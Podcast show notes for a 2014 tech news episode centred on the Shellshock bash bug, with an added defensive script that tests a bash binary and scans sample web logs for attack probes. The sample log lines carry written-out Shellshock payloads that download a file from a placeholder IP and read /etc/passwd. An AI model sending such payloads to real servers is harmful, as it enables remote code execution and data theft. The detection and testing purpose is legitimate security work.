DTNS 2330 – B*A*S*H

Logo by Mustafa Anabtawi thepolarcat.com

Breki Tomasson is on the show and while we will touch on a glaring omission from HealthKit, the main story is the bash vulnerability Shellshock. Thankfully Steve Gibson agreed to drop in and explain it to us!

MP3

Multiple versions (ogg, video etc.) from Archive.org.

Please SUBSCRIBE HERE.

A special thanks to all our Patreon supporters–without you, none of this would be possible.

If you enjoy the show, please consider supporting the show here at the low, low cost of a nickel a day on Patreon. Thank you!

Big thanks to Dan Lueders for the headlines music and Martin Bell for the opening theme!

Big thanks to Mustafa A. from thepolarcat.com for the logo!

Thanks to our mods, Kylde, TomGehrke and scottierowland on the subreddit

Show Notes

Today’s guests: Breki Tomasson, creator of the CSICon podcasting network, and Steve Gibson, co-host of Security Now and head of the Gibson Research Corporation

Headlines

Last week a vulnerability in bash was reported to Red Hat by Unix expert Stephane Chazelas. The vulnerability was revealed late Wednesday. GigaOm has a good roundup of the details, but it essentially comes down to this: bash lets a parent shell pass function definitions to a child shell through environment variables, and it recognises them by the value starting with “() {”. The name of the variable does not matter. Vulnerable versions do not stop parsing at the end of the function body; they go on to execute whatever commands follow it. So any service that copies attacker-controlled input into the environment of a bash process hands that attacker remote code execution. The most obvious case is a web server such as Apache running CGI scripts, which places request headers like User-Agent, Referer and Cookie into environment variables before running the script. It affects any OS that ships bash, which includes most versions of Linux and Mac OS X. It can also include many routers, webcams and other embedded systems that use bash (many embedded systems use BusyBox’s ash rather than bash and are not affected by this bug). Red Hat issued a patch for the original report, CVE-2014-6271, that was quickly shown to be incomplete (tracked as CVE-2014-7169), and Akamai published some mitigation measures, but more fixes from more vendors are expected.
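The following script is an added example for these show notes, not code from the episode or from any of the linked write-ups. It does three things the paragraph above describes: shows the legitimate function-export feature the bug lives in, probes a bash binary for the trailing-command execution, and scans web-server log lines for the “() {” prefix that Shellshock probes against CGI carry. The log lines and the IP addresses in them are constructed for the example (documentation address ranges), not taken from any real server.

```shell
#!/bin/sh
# Added example for the DTNS 2330 show notes (not the podcast's or any vendor's code).
# Runs under POSIX sh; bash is only needed as the binary under test.

# The feature the bug lives in: a parent bash serialises exported functions into
# the environment, and a child bash re-parses any variable whose value starts
# with "() {" as a function. This is legitimate and still works after the patch.
# Prints "hello from parent", or "no-bash" if bash is not installed.
exported_function_demo() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    bash -c 'greet() { echo "hello from parent"; }; export -f greet; bash -c greet'
}

# shellshock_probe [path-to-bash]
# Puts a crafted function definition with a trailing command into the
# environment of a child bash. The child itself only prints "marker"; a
# vulnerable bash also runs the trailing "echo VULNERABLE" while importing
# the function, a patched bash ignores it.
# Prints "vulnerable" (exit 1), "patched" (exit 0) or "no-bash" (exit 2).
shellshock_probe() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    out=$(env x='() { :;}; echo VULNERABLE' "$bash_bin" -c 'echo marker' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "vulnerable"; return 1 ;;
        *)            echo "patched";    return 0 ;;
    esac
}

# Constructed Apache-style access log lines (assumed format: combined log).
# Lines 1 and 3 carry Shellshock payloads in the User-Agent and Referer fields;
# line 2 is ordinary traffic.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:11:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/x -O /tmp/x\""
198.51.100.9 - - [25/Sep/2014:10:11:13 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:11:14 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { :; }; echo; /bin/cat /etc/passwd" "curl/7.30"'

# find_shellshock_probes: reads log lines on stdin and prints, with line
# numbers, every line containing the exact "() {" function-definition prefix.
# bash only treats a value as a function when it begins with exactly "() {",
# so a fixed-string match on that prefix is the right first filter; any
# header, cookie or query string a CGI handler exports can carry it.
find_shellshock_probes() {
    grep -nF '() {'
}

# count_shellshock_probes: number of sample log lines that carry the prefix.
count_shellshock_probes() {
    printf '%s\n' "$SAMPLE_LOG" | grep -cF '() {'
}

echo "function export works: $(exported_function_demo)"
echo "local bash is: $(shellshock_probe)"
echo "suspicious log lines: $(count_shellshock_probes)"
printf '%s\n' "$SAMPLE_LOG" | find_shellshock_probes
```

Run the probe against every bash on a host, not just the one in your PATH (for example /bin/bash and any copies bundled with appliances or containers), because the fix has to land in each binary. The log filter is a triage tool: it will find clumsy scanners and the early worm traffic, but a reviewer still has to read the matched lines, since the prefix alone says nothing about whether the server actually exposed CGI to bash.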

TechCrunch reports Apple says bent iPhone 6 handsets are extremely rare and claims only nine people have complained to the company about it. Apple claims under normal use the problem rarely occurs and notes the new iPhones are built with steel/titanium inserts to reinforce stress locations. Apple also claims iPhone 6 models underwent testing to ensure they can endure bending, sitting, torsion and other kinds of stress.

Kotaku reports Valve released the Steam Music player for its desktop client. It’s not a streaming (or should we say steaming?) service just an in-game music player for your existing collection. So for instance if you want to be able to listen to Peter Gabriel’s Steam on the Steam Music Player, we now live in a world where that’s possible.

The PC is NOT DEAD! At least not in the US. NPD reports consumer retail PC sales grew 3% in the US from July 4th through Labor Day week. Last year sales declined 2.5% in that period. Chrome OS led the way increasing 37 percent over 2013 and Mac products rose 14 percent. Windows devices dropped 3%. Overall laptops rose 3.4% while desktop sales were essentially flat.

TechCrunch reports Apple apologized for the “great inconvenience” caused by its faulty iOS 8.0.1 update and claimed developers are working around the clock to prepare iOS 8.0.2 with a fix that will hopefully arrive in the next few days. Apple officially recommends rolling back iPhone 6 and 6 Plus from 8.0.1 to 8.

Reuters reports that European data privacy regulators gave Google guidelines on legally collecting and storing user data. Google came under privacy scrutiny from the European Union as well as six individual European countries after the company combined its privacy policies and data collection from sixty services into one and gave users no way to opt out.

Apparently the EU feels a little warmer towards Facebook, because Reuters UK has two sources that say Facebook is about to win unconditional EU approval to purchase mobile messaging startup WhatsApp for $19 billion. European telecom companies like Deutsche Telekom and Telefonica want the EU to extract concessions from Facebook in light of WhatsApp’s plan to add free voice-call services later this year, but it looks like that may not happen. US regulators approved the deal in April.

News From You

BigJim1 submitted the ABCNews story on the successful arrival of India’s Mars Orbiter Mission and our subreddit users voted it up. The Indian Space Research Organisation (ISRO) is the first agency to succeed on a Mars mission at its first attempt. The orbiter program cost $75 million, which Prime Minister Narendra Modi pointed out was less than it cost to make the movie Gravity. It’s also quite a bit less than the $671 million NASA spent on the Maven mission to Mars.

Kylde didn’t want us to miss the Technology Review report that Google X Lab’s head Astro Teller, speaking at the EmTech Conference on Tuesday, said Google aims to have a continuous ring of high-altitude balloons above the Southern Hemisphere within the next year. Project Loon, as it’s called, will provide LTE data service to cell phones on the ground at rates of 22 megabits per second to fixed antennas, and five megabits per second to mobile handsets. Teller said “if we can figure out a way to take the Internet to five billion people, that’s very valuable.”

Discussion Links:  Shellshock and a glaring HealthKit omission

http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html

http://www.reuters.com/article/2014/09/25/us-cybersecurity-shellshock-idUSKCN0HK23Y20140925

http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html

http://www.openwall.com/lists/oss-security/2014/09/24/11

https://twitter.com/taviso/status/514887394294652929

https://gigaom.com/2014/09/25/the-critical-shellshock-flaw-affects-many-linux-and-apple-systems-heres-what-you-need-to-know/

http://www.wired.com/2014/09/internet-braces-crazy-shellshock-worm/

http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html

http://www.zdnet.com/first-attacks-using-shellshock-bash-bug-discovered-7000034044/

http://www.theverge.com/2014/9/25/6844021/apple-promised-an-expansive-health-app-so-why-cant-i-track

Pick of the Day: SpeedCrunch via Cody Olivier

My pick is SpeedCrunch. As a game programmer and CS graduate student, I need a quick, straightforward, and simple calculator with some power behind it. Enter SpeedCrunch. It is a calculator that is completely controlled by your keyboard (similar to a command line) which supports user-defined variables, a multitude of math functions, and comes with a table of scientific constants. It shows history, lets you retrieve previously entered equations, and my favorite feature is that as you type in an equation, it will have a little pop-up with the current answer to the equation. This is very useful when I am adding up a lot of numbers and want to see the current total. It works for Windows and OS X and has a portable Windows version. I also believe the program is open source for anyone who wants to modify or look at the code.

Friday’s guest: Darren Kitchen and Len Peralta